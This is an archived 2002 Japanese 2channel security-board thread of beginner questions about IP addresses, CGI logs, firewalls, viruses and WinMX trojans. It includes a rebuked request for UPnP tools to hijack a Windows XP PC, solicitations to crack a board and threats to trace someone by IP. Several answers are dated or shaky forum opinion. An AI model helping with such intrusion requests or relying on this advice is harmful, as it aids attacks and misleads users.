http://216.239.35.100/search?q=cache:50ihYmpmlT4C:usagi.tadaima.com/2chbbs/subback.html+&hl=ja&ie=UTF-8

すいません言葉が足りませんでした。
上記のアドレスに繋ぐと、
「以下の情報を記録させていただきました」
と表示されて、リモートアドレス？などの情報が表示されました。

>>331さん
どのようにやばいのでしょうか？Javascriptはつかってるんですが。

REMOTE_HOST が(none)
である以外は表示されていました。

>>330
そういった情報をホームページを見るときに相手に渡していますよ。
と言うものです。

>>335
ご返答ありがとうございます。
これで勝手にクレジットカードから引き出されたりとか
そういうものではないのですか？

ここにもあるよ。
http://www.mse.co.jp/ip_domain/user_script.shtml

>>336
そういうものじゃないです。

やっと安心して眠れます。ありがとうございました。

>>336
そもそもPCの中にクレジットカード情報なんて置いておかなければ、
持っていかれることもありません。:p

そういったニュースをたまに見かけるので心配してしまいました。

ウェブ上にアップロードしたcgiが何者かに書き替えられてしまいます。
パーミッション等もマメに変えてみたりはするのですがダメみたいです。
何かいい対処法はないでしょうか？

>>341
サーバー管理者に相談してください。
恐らく、貴方の勘違いです。

>>342
いえ、勘違いではありません。
掲示板に書き込まれたみんなのログも消えるので
不審に思いffftp側にアップされているlogファイルを見ると
0になってます。
ダウンロードしているlogについては再アップで復活するのですが・・・

>>343
与えられた領域を使いきってるとか。

>>343
ログファイルのパーミッションは？

>343
>344と同じ意見。
例えば漏れの使ってるレンタルサーバーだと、容量がオーバーすると
そのファイルが消される事もある。

「消える」と「書き換えられる」の違いはわかるよな？
「書き換えられた」なら、何がどう変えられたかによるんじゃないか？

>>343
どうせ、不正なCGIを使用してるんだろ。

>>343
ヘボCGIは排他制御してないから、同時書き込みでクリアされるという罠。

>>343
cgiが書き換えられてるのとlogが消えてるのじゃ意味が違うだろうよ。
いずれにしても「書き換えられてる説」は勘違いに1票。

logを書き換えてるのはcgiでせう。

ソースネクストのインターネットセキュリテイを買いました。
説明には「ソフトウェア１部につきパソコン１台にインストールできる」
と書かれているのですが、
私はあと２，３ヶ月でパソコンを買い換える予定なんです。

そのときに、新しいパソコンに先日買ったこのインターネットセキュリティを
インストールすることができるのでしょうか？
また買いなおさなければならないのでしょうか？

>>351
買い換えて、そのパソコンだけで使うのであれば問題なし。
古いのも一緒にインストールしようとするのはダメ。

http://www.google.co.jp/search?q=%E9%9B%BB%E8%84%B3%E5%A0%82&ie=UTF-8&oe=UTF8&hl=ja&lr=
電脳堂が無くなってしまった・・。

http://jbbs.shitaraba.com/computer/2100/jsweb_1.html

初めまして。
僕はＨＰを持っているんだけど、掲示板で書いた人のホストをしています。
しかし、一人だけ？４桁の番号をコロコロと変えて荒らしている人がいるんですが
アクセス拒否の対策はないんでしょうか？
下に４桁の番号の一部を紹介します。
133.49.200.203
212.214.3.173

>>352

どうも丁寧にありがとうございます！！
早速インストールします！！

>>355 >４桁の番号
それのどこが４桁やねん？ 算数からやり直した方が・・・(以下省略）

>>357
つっこんでないできちんと答えてやれよ。お前答えられないんだろ。

>>355
IPアドレスについては、ネットにつないだときにある程度の範囲でランダムになる。
だからIPアドレスでの制限は厳しい。
上段のアドレスは佐賀の大学らしい。頻繁にあらされるなら、管理者に、アクセスしている掲示板、
時刻を連絡して相手に注意してもらうことも手段。ただし、大学のセキュリティーが甘くてほかのクラッカーに
利用されている可能性も捨てきれないので、いきなり大学の管理者に怒鳴り込むのはやめましょう。
もし、その大学の学生さんだったらうまくいけば、荒しを退学に追い込めます（ｗ

それと下段のIPはよくわかりません。（ごめんなさい）
学外から、ほかのサーバーを経由しての書き込みかもしれませんね。
こうなるとちょっと防ぎようかないかも。

>>355
212.214.3.173は外部から使えるプロキシサーバ。設置場所はスウェーデン。
あらしは黙って削除して後は無視、そのうち飽きる。これが鉄則。

>IPアドレスについては、ネットにつないだときにある程度の範囲でランダムになる。

うーむ。したり顔で微妙な嘘を書くのがいちばん厄介かもナー。

嘘じゃなくて大真面目なのかも

windowsXP+IE6,ｱﾄﾞﾐはパスなしのPCを
乗っ取りたいのですが、nbt経由では
XPから空白のパスだと侵入できないので、
無理みたいでした。
IEのバグ（nimda系とactivX系）をついて、exeを実行させようとしましたが
無理みたいでした。
　それで、UPnPを利用してみようと思うのですが、
UPnP関係のツールを教えてください。

>>362
「この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
　様々なネット上の危険からの防御法や対策を語りあうための板です。
　掲示板の荒らし方や侵入の方法、メールボムの送り方等、
　攻撃方法の質問はご遠慮下さい。」

オーストラリーアからBackOrificeによる攻撃を喰らったらしいです。

普通ですか？

dakara kougeki ja ne-ttuno...

>362,365
それが人に物事を聞く態度か？
うせろ

>>345
パーミッションは705です(サーバーの推薦)

パーミッション600の分についても0バイトになっている時があります。

>>348
ヘボかどうかまでは分かりませんね。

>>367
お前にはわからなくとも、わかる奴にはわかる。

>>366
365 -> 364

>>367
ログ飛んだだけ。
そのCGIにどれくらいのアクセス数があるかわからんけど、
排他制御（ロック処理）してても飛ぶことはあるね。

ログのパーミッション705って書き込みできないじゃん。CGIのパーミッションの間違い？
ログが600でいいなら、CGIは700でＯＫでしょ。

>>370 正しい排他制御が行われていれば飛ぶことは無い。

>371
是非とも、ログの飛ぶ事のない正しい排他処理を教えてほしい。

>>371
いんや、排他制御以外でもプロセスが途中で死んじゃうと飛ぶよ。
変なとこ(open()でデータをフラッシュするまでの間とか)でブラウザの中止ボタン押されたり。
シグナルハンドラ無視するとか方法あるけど板違いだね・・。

>>371
cgiは700ですよ。
logが705です。

>>374
＞logが705です。
これは問題だ。

>369 失敬

>>375
サーバーの推薦なんですよ。

>>377
http://hccweb1.bai.ne.jp/siriasu/etc/permision.htm

http://www.jiji.com/cgi-bin/content.cgi?content=020702225602X719&genre=soc
これも２ちゃんでお祭りになりましたか？

ひとりでもF5こうげきできますか？

恐れ入りますが初歩的質問ですいませんが。
友人のエンジニア（ハード）に、セキュリティについて
ファイアウォールの話をした所、
「『踏み台』とかってプロキシの話でしょ。
例えば80番の受付嬢に話されてもサーバー機能なけりゃ
どうしようもない。そう神経質になることもない。
窓ってOS自体がサーバーになってるのかな。よう知らんけど」
と言われたのですが、そういうことなのでしょうか。

>381
よう知らん人間の話を信じるな。

>>381
ブラウザの穴突かれて、サーバー機能仕込まれるという事もありうる。

>>382
ポートが空いてようが平気ってわけじゃないですよね。

>>381
いつの間にやら所属不明の見知らぬ受付嬢が、
そ知らぬ顔で取次ぎを行う場合もあるので、
注意が必要です。

ADSL、ダイアルアップルータ環境でSygateを使用しているのですが
MAC Spoofingでデフォルトゲートウェイを
名乗っているアドレス(192.168.0.11)からARPが飛んできます
この場合、ルータがクラックされているのでしょうか？

webブースターとかローカル串立ててる場合は？

そう神経質になることは無いのは同意だが、その人Netbios開いてても
神経質になること無いよとか言いそうだな

>>377
いずれにしてもCGIもサーバもわからなきゃ答えは出ない

メールに添付ファイルとしてコンピュータウィルス（W32.Klez.gen@mm）が、
送られてきました。まだ開いていないです。駆除していのですが、どうすれば
いいですか？ただファイルを削除するだけではダメですか？
駆除ツールを使用しないとダメですか？誰か教えてください。

>>390
ウィルス検出＆ウィルス名が判明してるってことは、
アンチウィルスが何らかのアクション（駆除・隔離）をしたと思われ

>>390
ネタはよそで

お答え有難うございました。
ではポート、NetBiosも閉じておくのが基本、しかし
サーバー機能のない一般家庭のパソコンでは
踏み台にされることも稀だろう、ということでよろしいのですね。

httpd立ててない一般のパソコンつっても、ローカルプロクシの役割をする
Webフィルタリングソフト（Proxomitronとか）は設定如何で踏み台にされるし
netbios外に開いてたら、net useコマンドで厨房でもHD丸ごと共有されるし
（そこまで酷いプロバもあんま無いと思うが）、そもそもパーソナルファイヤーウォール
って、Application filteringが大きいんだし。トロイくらってたら（その時点で救い無いが）
いくらでも踏み台にされるしね。PFWはそれを100%防げる。
クライアントだから安全って考えはわけわからんです。終わり

つか、PFWなんて保険だから。
漏れ人ひかねーから保険いーらねっつって子供引いて億単位で
請求きても遅いわけで。

http://www2.realint.com/cgi-bin/kidojutu/tbbs.cgi?kidojutu
クラックできる人いる？

空気を読めない人が来たぞ。

ｻﾞﾜ　ｻﾞﾜ　ｻﾞﾜ
　ｻﾞﾜ　ｻﾞﾜ

逃げて逃げて〜！

from:welcom<[email protected]>
subject:A new game

<HTML><HEAD></HEAD><BODY>

<FONT>This is a very new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT></BODY></HTML>


PostPet>>>>>添付ファイル:no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類ﾌｫﾙﾀﾞに展開しました

PostPet>>>>>添付ファイル:0no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類ﾌｫﾙﾀﾞに展開しました
こんなメールがきました。どうすればいいですか？誰か助けてください。

400 名前：名無しさん＠お腹いっぱい。 投稿日：02/07/03 10:56
from:welcom<[email protected]>
subject:A new game

<HTML><HEAD></HEAD><BODY>

<FONT>This is a very new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT></BODY></HTML>


PostPet>>>>>添付ファイル:no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類ﾌｫﾙﾀﾞに展開しました

PostPet>>>>>添付ファイル:0no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類ﾌｫﾙﾀﾞに展開しました
こんなメールがきました。どうすればいいですか？誰か助けてください。

こんなマルチポストがきました。どうすればいいですか？誰か助けてください。

(ﾟДﾟ)ｙ─┛~~

>>400->>401
いくつマルチポストしてるんだか。
どんどん自分の首締めているぞ（答が貰えなくなる。）

>>401はネタだろ。

諸事情で３週間ほどメールチェックできず、つい今しがた確認したら
未読が約15000通･･･。
9割9分がどこぞの会社の自動返信。
嫌がらせでも、15000は見た事無いし･･･新手のなんかでしょうか？
どうしようもないのでメールボックス削除したんですけど、何か流行
りのものとか情報がありましたら、よろしくです。
なにぶん、一ヶ月も離れてたので･･･。

>>405
メールボムだったら特に流行とかいうもんでなく、
ずっとある現象だと思うけど。

すみません、質問なんですが、
ICQを使ってて、ハッキングとかされることがあるのでしょうか？

>>407
ここら見ておくといいかも。
http://pockets.otto.to/icq/security/step5.html

今朝、名前欄に固定＋fusianasanを入れてしまいました。どうしたらいいのですか？

別に何も

>>409 ひろゆきにケツの穴提供すれば何とかなるかもしれません。

プリインストールされていたマカフィーを削除したらメールが急に
受信できなくなりました。送信はできるんですが。。。
アカウント・パスワードがはねられます。
メーラーはアウトルックエクスプレス５、OSはWin98です。
マカフィーの亡霊の仕業ですか？
しごとでメール使っているので、仕事になりません。泣。

>412
アウトルックをアンインストールして別のメーラを入れろ。
仕事で使うならなおの事。

MXってなんですか？

59 名前：,,,本気で困った。 投稿日：02/07/03 13:00
プリインストールされていたマカフィーを削除したらメールが急に
受信できなくなりました。送信はできるんですが。。。
アカウント・パスワードがはねられます。
メーラーはアウトルックエクスプレス５、OSはWin98です。
マカフィーの亡霊の仕業ですか？
しごとでメール使っているので、仕事になりません。泣。
http://pc.2ch.net/test/read.cgi/win/1022134711/

>>413
OEけなすのは構わんが、まともなメーラも一緒に紹介しろ。

>>414 http://www.zdnet.co.jp/products/us/internet/winmx_u.html
漏れはお勧めしない。詳細はダウンロード板へhttp://tmp.2ch.net/download/

>>417
どうしてお勧めできないの？皆使っているみたいだけど

>>418 違法かつ危険、それを承知の上でどうぞ。皆使ってるわけではありません。
詳細はﾀﾞｳｿ板へ。

>>419
MX自体は違法じゃない。
つかいかたが違法なだけ。

MXネタはここではセキュリティに限定してください。
●ＨＤＤ全消去ウイルス３●
http://pc.2ch.net/test/read.cgi/sec/1024943662/l50など。

その他はダウンロード板でhttp://tmp.2ch.net/download/

MXが危険とはどんな点なのよ？

>>422 しつこいね。リンク先嫁。以上。

>400
ごめんなさいあせってて
もうしません。マナーって
ものをしりませんでした。

>>408
リンク先を拝読し、勉強になりました。
どうも、ありがとうございました。

誰か教えて下さい。
２ちゃん以外つながらなくなったのはなぜか。

つーか、ワールド音楽板のトップの絵は何だ？
http://music.2ch.net/wmusic/

またクラックされたのか？？

>>426
ブラウザ（IEとかね）のアドレス欄にコピペして、両方とも開けるかな？
http://yahoo.co.jp/
http://210.81.150.166/

>>427
漏れ、そゆ絵好き。。。。。

>>394さんが言うように、Proxomitronのようなソフトが踏み台にされるとは
どういう場合ですか？設定如何でとありますがどうすれば防げますか？
PFWがあれば大丈夫？

ローカルプロクシなんだから。
外部に対して 8080 開いたらダメだろ。
LAN 内で Proxomitron を共有するような使い方は危険だって事

それと。
おみとろんじゃ無いが、UA 弄ったりする某ソフト
（当然ローカルプロクシとして動作）はデフォで外部におっぴろげで、
普通の串同様 8080 で connect 出来るらしい。ﾄﾞｷｭｿｿﾌﾄ怖いね。

>>431
あはぁ！漏れと同じ意見の人、セキュ板で初めて見た。
某所で書いたら、滅茶苦茶叩かれて（涙

Agnitum Outpost Firewallを入れてます。
通信の要求って項目がとんでもない勢いなんですけど、これは
普通ですか？

>>433
普通

174 名前：大学への名無しさん ：02/07/03 20:49 ID:97JCsbai
おまえの住んでるところただ今調査中。

175 名前：大学への名無しさん ：02/07/03 20:51 ID:97JCsbai
にくたらしいいやつ　絶対つきとめてやる！

176 名前：某大学の院生 ：02/07/03 20:52 ID:1V1a+EX+
>>174
大阪の何区でしょうっか？
シンキングターイム！

177 名前：大学への名無しさん ：02/07/03 20:54 ID:97JCsbai
１７１
５人がかりで数少ないけど調査中

178 名前：某大学の院生 ：02/07/03 20:56 ID:1V1a+EX+
>>177
もし、携帯ならどうなるん？

179 名前：大学への名無しさん ：02/07/03 20:58 ID:97JCsbai
おまえあほか？ＩＰアドレスを調査してるんじゃ

>>435
>>7

>>436
大丈夫ってことやね。
サンクス！

唐揚くいて〜。

>>434
安心しました。
ありがとうございます。

KLEZ.H
って言うウィルスに感染したんですが、どうすれば良いんでしょうか？
あと、どれくらい悪質なんでしょうか？

そう言えば、微妙に>>7違うね。
http://www.netlaw.co.jp/kaisei/provider/03.pdf
まあ、IPアドレスから住所調べるとか言ってる程度では関係ないが。

>>440
Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/

>>432
bindするアドレスを指定できないネットワークサーバプログラムは糞。
必要も無いのにINADDR_LOOPBACK以外にbindしてるユーザは糞。

うちのTinyが「UDP Datagram from 172.16.255.254:2051 was blocked by rule 'All Deny'」
だと騒ぐのですが。ポートは1053番が叩かれてます。
しかしこれってプライベートアドレスのBクラスでは･･･？
我が家の家庭内乱じゃ192.168.***.***しか使ってないし。

初めて見るんですがなんなんでしょ･･･

すみません、ポート１４３３（ＳＱＬサーバー）にやたらと
アクセスしようとしてる人が居るんですが、
この人何をしようとしてるんでしょうか？

trojan blocked in tcp, 24 48 152 179:3409->localhost:1433, owner no owner
（trojanは設定したルールの名前です）

>>443
そりゃウィルスに感染したサーバが次の標的を探してるの。
http://www.watch.impress.co.jp/internet/www/article/2002/0522/spida.htm
じゃないの？

間違えた。>>444だ

>445
そ、そうなんですか？
実は最近パソコンが急に重くなったんですが・・・
なんかに潜られてるのだろうか。（蒼）

レスありがとうございます。
お礼言うの忘れてた、、、（汗）すみません

＞４４５のリンクへ行けないや・・。
たまにブラウザが異様に重くてサイト見れないときがあるんです。
後で繋げる時にもう一度繋げてみます。ありがとうございました。

http://tmp.2ch.net/test/read.cgi/download/1024930771/l50
238以降最新まで流しながら参照くだされ

>>444
SQL鯖立ててないんなら問題なかろぅ。

>>443
ISPの機器からのパケットだろう。

>>450
アプリついでにカモも共有ってことだろ。
そのうち、アカウントとパスも共有されんだろうな。ご愁傷様。

>>450
すごい展開になってるみたい380あたりから。

>>450
これは>>414=418なんかにも読ませたい内容だな。
読んでもわからんだろうけど。

age

１０分かんのうち９５回もTCPPort6346アタックしてきた奴出していい？
ホントにうざいんだよ。

Ad-wareでチェックすると、必ずといっていいほど、cookie
doubleclickというクッキが見つかるんですよね。消してもWIN再起動すると
また出てきてしまう。
したのがファイル内容で、
test_cookie
CheckForPermission
doubleclick.net/

この後ろになにやら数字が並んでいます。
これはいったい何なんでしょうか？

ノートンインターネットセキュリティ２００２を買おうと
思うのですが通常版とプロフェッショナル版があるみたい
なのですが、どちらを買えばよいでしょうか？性能のいい
方買いたいのですがどちらの方がいいですか

>>458広告を有効に配布するための個人識別用クッキー。
>>459性能は同じです。必要な機能のある方をかえばよろし。
機能比較↓
http://www.symantec.com/region/jp/products/nisproducts/

208.2.157.34逝ってよし！

>>458
ダブルクリック社って結構話題になっていたこともあったが
知らない人も多いかなあ。
検索するといろいろ分かるよ。
http://www.google.com/search?num=100&hl=ja&ie=UTF-8&oe=UTF-8&newwindow=1&q=doubleclick+cookie&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

>>460&462
ありがとうございます。

フリOpera使ってる自分はあまり文句言えなさそうですね。

>>460
多少プロフェッショナル版の方に強力そうな機能がありますが
無くてもいいような物なのでしょうか？

>>463
Operaなら設定のプライバシーのところでクッキーを受け入れるかどうか設定できる
から、必要なサイトのみ受け入れるようにすればダブルクリックのクッキーは作成
されない。サードパーティのクッキーは当然拒否。

>>464 個人用途ではノーマルのNISで十分と思う。

>>466
横レスだけど。 NISのIDS評価してたらレポートプリーズ。

さっき
【データ流出】企業の顧客データもろみえ その５
のスレで紹介されてたURLにアクセスしたら
データが見れたんだけど、後で追求されたりしませんよね…？
学校からアクセスしたんだけど。
これって私が不正アクセスしたことになるの？

>>468 Web上で公開されているものにアクセスしても不正アクセスにはなりません。
ただ、そのサイトが事件に関係して犯罪捜査があったときに警察から問い
合わせがあったりするかもしれません。その場合でも逮捕されたりするこ
とはないので安心して。

>>469
http://user:[email protected]/だとヤバイかも。
ヤフオク荒らして逮捕された奴らと論理的には同じ事。

>>470
パスワードかかってるところは公開されてるわけではないから、不正アク
セスになりうるよね。たとえそのパスワードが晒されていたとしても、権
限のない第三者が晒したものであればそれを使って中に入れば不正アクセ
スだね。
http://www.ipa.go.jp/security/ciadr/law199908.html

いまのところ該当スレでそのようなサイトはないから大丈夫じゃない。

今起きた事なんですが、、

2ch見てたりしてただけなのに妙にHDDにアクセスしてる気配があったんですよ。
でね、アクセスされてるファイルを見つけたんですがフォルダのプロパティ見たら
「このフォルダを共有する」ってなってたんですよ。アホかと。
「共有しない」にチェックしたら止みましたけど、これって漏れが悪いんですか？

>>472 そうです。
ところで接続はCATVそれともYBB？　MXはやってますか？
パーソナルファイヤーウォール入れてますか？

>>473　
回線‥‥CATV。MX‥‥やってます。
パーソナルファイヤーウォール‥‥入れてません。




なんで知ってるんですか？ｱﾌｫにこういう奴が多いから？

すいません、誰か助けてください！
outlook expressのログオンのパスワードを忘れてしまいました！
もう見ることは出来ないのでしょうか？
宜しくお願いします。

>>474 あんたも無知だな。ｱﾌｫ丸出し
YBBやCATVはほかのユーザーからもアクセスできる

>>476
はあ、環境じゃなくて人間がｱﾌｫでしたか
勉強になりました

Shields UP!の日本語解説サイト http://www.upsizing.co.jp/news/report0426.html

→http://www.upsizing.co.jp/news/report0426.htm

>>475
マルチだったのかよ。初級ネットで答えてくれた人いたぞ。

>>475
PC初心者でも質問してんじゃねーかボケ


と突っ込んでおくテスト

>>475 http://pc.2ch.net/test/read.cgi/pcqa/1025747795/203-207

２chの同じ板で同時刻でIDが同じってあるんでしょうか？
また、IDを意図的に変える（詐称する）事って出来るんでしょうか？
どなたか教えてくださいマセ。

>>482 前段：ある。後段：変えることは出来るが、詐称は出来ない。
ホントにくだらない質問だな。IDがどうやって振られているか調べれば
分かることだろ。

>>482
２ちゃんの使い方関係は板違いだけど、まあここ見て。
http://www.skipup.com/~niwatori/
で、IPアドレス＝リモートホスト依存なので、同じホストの
人がいれば同じIDになり得る。携帯電話とかCATVでは
結構あるらしい。
また、IPを変えればIDは変えられるわけだ。あとは類推。

>>482
あと何かあったら初心者の質問板の方へ。

>>483
同時刻で漏れと同じIDの書き込みがあったからびっくりしてさ・・・
ということは偶然だったんですかねぇ？

IDってIPと日付から関連付けされてるんですよね。
ほんとに詐称はできないの？

ああ、板違いでしたか・・ｽﾏｿ

＞IDってIPと日付から関連付けされてるんですよね。
てのがわかってて
＞ほんとに詐称はできないの？
何でこんな事聞くんだろう・・・

質問させてもらいます。
新しいＭＸの楽しみ方
http://tmp.2ch.net/test/read.cgi/download/1024930771/
の203氏がトロイでこんな事できるんだぜへっへーんといってトロイのクライアントソフトと
トロイに感染している人のIPを晒しまくっています。実際やってみたらその通り、丸見えでした。
本当にこんなことができるんだなと新たな発見ともしかして自分も、、、という恐怖を感じました。

ここから質問ですが、このトロイに感染している人たちはなぜ気づかないんでしょうか？
それとも気づいていながら知らん振りしているのでしょうか？非常に恐ろしいです。
本当に気づいていないとしてもなんかPCの調子がおかしいなと思いそうですが…

セキュリティ板の方たちのこのスレの感想と意見が聞きたいです。

くだらない質問ですがﾖﾛｼｺおながいします

>>489
MXってどういうことやってんのか分かってんのか？
分かっていないならP2Pとかでちょっと検索でもやってみそ。

(´-`).｡oO（変なソース貼るからﾀﾞｳｿ板から流入するじゃねえか・・・）

阿呆だから。としか言いようが無い。
大体トロイ入りのexe開くような阿呆が
トロイって言葉しってるとも思わないし、
トロイ入ってるexe踏めちゃうって事は
アンチヴィールス持ってない（or 使ってない）わけだから
気付かないだろうね。ま、トロイ経由でメッセージ送ったりすれば
さすがに何か気付いてアンチヴィールス買って来るかもねぇ。

>>489
> ここから質問ですが、このトロイに感染している人たちはなぜ気づかないんでしょうか？
厨房だから。

> それとも気づいていながら知らん振りしているのでしょうか？非常に恐ろしいです。
可能性は0ではないが、本当に気づいてないのだろう。

> 本当に気づいていないとしてもなんかPCの調子がおかしいなと思いそうですが…
少し重いなとか、ネットワークのアクセスがいつもより頻繁だとか、ディスクアクセスが怪しいとか
注意深ければ気づくかもしれない。

つか、MXやってる連中って
貰ったexeウィルスのチェックもしないで実行するのか？？

>>490
　MXはもう卒業しましたが、P2Pとはいったいどういうものかは漠然と分かっているつもりです。
専門的には分かりませんが。
>>491
　ﾀﾞｳｿ板にはこちらのソースは書き込んでいませんです。
>>492
>>493
　やっぱ、阿呆なんですか…のほほんとMXやっててHDD覗かれているなんて夢にも思って
いなんでしょうかね（＾＾；ｱｾｱｾ　
　
　しかし、このトロイっていうのはよくできたソフトですね。踏み台にされるって言うのも納得できます。
この晒されている人たちがある日突然不正アクセスでﾀｲｰﾎなんてこともありかねないってことですか…

>>495 ﾀﾞｳｿ板でウィルスソースを貼り付けたﾔｼがいるので、アンチウィルス
ソフトが反応して騒ぎになり、多数がセキュ板に来たことを指していると思われ。

>>496
あっ、そういえば今ﾀﾞｳｿで騒ぎになっていますね。いったい何なんでしょうか？

ウイルス汚染！！ACCSの攻撃？
http://tmp.2ch.net/test/read.cgi/download/1025773193/

このスレッドですね。ノートンさんの最新版入れていますが何にも反応ありません。
これは一体、、、ただ単にノートンさんのページの設定ができていないだけのような...

>>497
http://pc.2ch.net/test/read.cgi/sec/1023828379/560

ﾀﾞｳｿ板の奴がvbsのソースコピペして
そのソースにノートンとかが反応して
そのノートン使いの一部の阿呆が、ウィルスに感染した〜
とか騒いでるだけ。

ちなみにこのトロイに引っかている人たちのIPはどうやって調べているんだろうか？

トロイのサービスポートで適当にポートスキャンすればいいじゃん

自分で付けてMXでばら撒いてる
アドレス知るなんざた易いこと

感染先から連絡があるんだから、調べるまでもないよ。

>>504
それだと自分の身元が、逆に一発でバレませぬか？

フレッツADSL(1.5M）
ＷＩＮ９８（ＳＥではない）

zone alarm ｖ2.6.362を入れたのですが
平均スループットが
1200kbps台から600kbps代後半にまでおちこみますた
（ゾヌ使用中も使用していないときも）
アンインストールして大抵のｄｌｌも削除し
（vspubapi.dll vsutil.dll vsmonapi.dll vsdata.dll vsdatant.sys等）
MTUなども弄り直したのですが
速度がまったく元に戻りません
どのように対処したらいいでしょう？

MXやってないのにＰＣが急に重いです・・・どうして・・。

トロイしかけられた方が
ネットに接続した瞬間にメールかICQでIPアドレス知らせる機能が
あるんだけど、トロイかかるような阿呆がそこ押さえられるかどうか
知らないけど、最高で捨てメアドかICQの連絡先？（ICQ使った事無い）
くらいは分かるかもね。

>>506
ZoneAlarmをスタートアップからは外して、再起動してもそうっすか？
ADSLモデムの電源をプッチーンって切断してもう一度やってみるっつうのも、どうでしょか。

>>507 このタイミングでその質問はまずかった… ネタとしか思えん。

>510タイミング悪くてすみません。

ネタじゃないです。というか数日前からなんで。
正確には軽くなったり重くなったりしますが、
基本的にはずっと重いです。
最初の頃はどうしても固まってたんですが最近それはないです。

>>511
こびとさんがうしろでひっぱってるからです



CPU時間食ってるプロセスを調べなさい

>>509
電源プッチン半信半疑でやってみたらマジで効きました
1.28Mbpsまで完全に元通りになりました

ども有り難うございますた

>>513
息継ぎ現象っすね。

>>514
さっきここに書き込む前に

コントロールパネル→ネットワーク→LANカードのTCP/IPのプロパティーを表示→
IP アドレスタブをクリック。
「IP アドレスを指定」にチェック
IP アドレスの値は「192.168.0.5」等
サブネット マスクの値は「255.255.255.0」等

ってやってみたんですが
それでは解決しませんでスタ

まあともあれ
解決してﾖｶﾀです

>>514 http://www.watch.impress.co.jp/broadband/column/stapa/2001/10/09/

>>515
それは重い／軽いには全然関係ないですな。
あと、ADSLモデムの電源は時々落としたほうがいいですよ。
入れっぱなしだと、速度が落ちる一方ですから。
まぁとにかく解決してよかった。考えてみたら板違いもいいとこだけど。

>>517
ゾヌアラームだったからここに書いたけど
確かに板違いかも知れない

ｽﾏﾝｶｯﾀ

>>516
プチ勉強になりました、多謝。
フォールバックって単語をメモしときました。

>512
どうやって調べればよいのでしょうか・・・。

>>520
タスクマネージャの「プロセス」タブの所で見る。
「CPU」の欄の数字がCPU使用率で、特にCPUを使うものがない時は
「System Idle Process」が95%とかになってる。
タスクマネージャは、XPだとCtrl+Alt+Deleteで起動する。他は知らん。

>>521=XP使用

リモートホストから、相手のＡＰのある地域を調べることってできませんかね？
プロバイダーとかはすぐわかるのですが、ＡＰまではどうやって調べればいいのか。
別に悪いことに使うわけではないですので。

何か不正プログラムが入ってきて削除できません。
フォルダ名はxeroxです。まあエロサイトでやられたわけですが。
削除しても誰か使ってるか、プログラムで使用しているってことなんです・・
よろしくお願いします

>>524
↓これじゃなくて？
http://support.microsoft.com/default.aspx?scid=%2Fisapi%2Fgomscom%2Easp%3Ftarget%3D%2Fjapan%2Fsupport%2Fkb%2Farticles%2Fjp418%2F6%2F34%2Easp&LN=JA

あら・・・。変なプログラムじゃなかったんですね。お騒がせしました。
525さん、ありがとうございました。

>>450の件が、なんだかおもしろい展開になっとる。

>>527
ほんとだ。逮捕されるのかな？

すみません、お聞きします。

企業のドメインからIPアドレスがドメインサーチなどで
検索されますが、そのIPを直接アドレスバーに打ち込んで
サイトを見るのはいけない事なんでしょうか？
またIPを打ち込んで見にきたと管理者側に分かるものなんでしょうか？

ドメインサーチで簡単にIPアドレスって解ってしまいますが
普通そんな簡単に解ってしまっても構わないものなんでしょうか？
今度自社サイトを作るつもりなんですが
よく「IP抜いた」とかハッカーやクラッカーなどは
IPを調べてから攻撃する、などと聞いてなんだか心配です。
ほんとに下らない質問ですがどなたか宜しくお願いします。

>529
IP直打ちの方が微妙にアクセス速度が速くなる。(DNSを通さないから)
それ自体には問題がないが、何らかの理由でIPが変更された時に困る。

IPアドレスについては>7読め。

IPアドレスってのが「住所」ってのはわかるよな？
銀行強盗なんかは銀行の住所がわからないと強盗に入れない。（場所を知っているというのも同義で）
ハッカーやクラッカーも同じ。
住所がわからないと何もできない。
だから調べる。
しかし、住所は一般に公開されてるものだ。
住所がわからないと郵便物も届かない。
住所は常に公開されている。
住所がわかる事自体には何の問題もない。

>>450のスレを見て質問
OSはMeです
もしNAVでも検出できないようなトロイに引っ掛かったら
msconfig→スタートアップの欄にも***.exeは表示
されないのでしょうか？

>>527
ダウソ板ってほんとにひどいな。蜜壷作成決定。
…と思ったけどVMWareで十分か

VBS,Internal
↑今日は特に怪しいURL踏んでないのに
今、ノートンで検出されたウィルスです。
踏んでから検出されるまでって結構時間かかりますか？

>>534
No

>>535

ってことは、ついさっき踏んだってことですよね？

tp://poteto.itits.co.jp/b.asp?S=dirbaku&VNO=79
tp://live.2ch.net/test/read.cgi/weekly/1021347631/

参考までに貼ってみます。上記２つのＵＲＬしか踏んでなかったはずなのに･･。
（しかも下の方は２ch内ですよね？）
あとはKB数の低い知人からのgooアドを開いたり
hotmailのＤＭを削除しただけです。
どこでこういう質問したら一番よいでしょうか。

>>534
もう、ﾈﾀか？っつーほど既出なんだが。
ﾀﾞｳｿ厨は過去ログとか100ぺん見てから書き込め

【ノートン】インターネットセキュリティ2002 Ver.9
http://pc.2ch.net/test/read.cgi/sec/1023828379/
☆ウィルス情報＆質問　総合スレッド☆part4
http://pc.2ch.net/test/read.cgi/sec/1024061532/

579 名前：超超既出 投稿日：02/07/05 00:58
560 名前：ダウソのウイルス原因 投稿日：02/07/04 18:45
えーと、どうやら色々と調べた結果
ここのスレの197(･･･かな？)の書き込みを表示すると
ウイルス感染するみたいです
ttp://tmp.2ch.net/test/read.cgi/download/1025717301/-100
"VBS.Internal"←とか言うウイルスでした

562 名前：名無しさん＠お腹いっぱい。 投稿日：02/07/04 19:17
書き込みを表示するとウィルスに感染するって、んなアホな。
と思って見にいったら、VBSのソースじゃねーか・・・。
そりゃ警告出すだろうが・・・

ﾀﾞｳｿ板ってある程度危険なことしてるんだろうから
もう少し基礎知識あってもいいと思うんだが・・（そのスレの197前後見るとねえ）
とりあえず、気にしなくて良いよ、とだけ。

